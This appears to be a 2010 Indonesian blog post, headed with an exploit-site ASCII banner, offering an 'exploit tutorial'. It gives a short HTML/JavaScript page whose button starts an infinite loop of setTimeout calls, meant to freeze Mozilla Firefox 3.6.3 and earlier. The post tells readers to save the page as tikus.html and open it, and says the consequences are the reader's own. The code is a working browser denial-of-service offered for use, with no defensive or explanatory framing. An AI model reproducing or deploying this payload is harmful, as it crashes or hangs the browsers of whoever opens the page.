0
comments
|
6/11/10
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0 0 _ __ __ __ 1 1 /' \ __ /'__`\ /\ \__ /'__`\ 0 0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1 1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0 0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1 1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0 0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1 1 \ \____/ >> Exploit tutorial 0 0 \/___/ type (local, remote, DoS, etc.) 1 1 1 0 [+] Site : tikus.tk 0 1 [+] Support e-mail : chevssites@cyberservices.com 1 0 0
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
- buka notepad
- copas code exploits yang ada di bawah :
@Exploit:
<html>
<head>
<script type="text/javascript">
function mouseOver(){
b1.src="image.jpg";
}
function mouseOut(){
b1.src="image2.jpg";
}
function flash(){
while(1==1){
var t=setTimeout("mouseOut()",500);
var t=setTimeout("mouseOver()",500);
}
}
</script>
</head>
<body>
<img border="0" alt="www.site.securityspl0its.com"
src="3.jpg" name="b1"
onmouseOver="mouseOver()"
onmouseOut="mouseOut()" />
<input type="button" value="Click me!"
onclick="flash()" >
</body>
</html>
. simpan dengan nama tikus.html.coba dech buka tikus.html tersebut.akibat ditanggung sendiri
100% bekerja pada @ mozilla Version: <= 3.6.3
salam tikus GO_BLOGger
Labels: exlploits
0 Comments:
Post a Comment
<< Home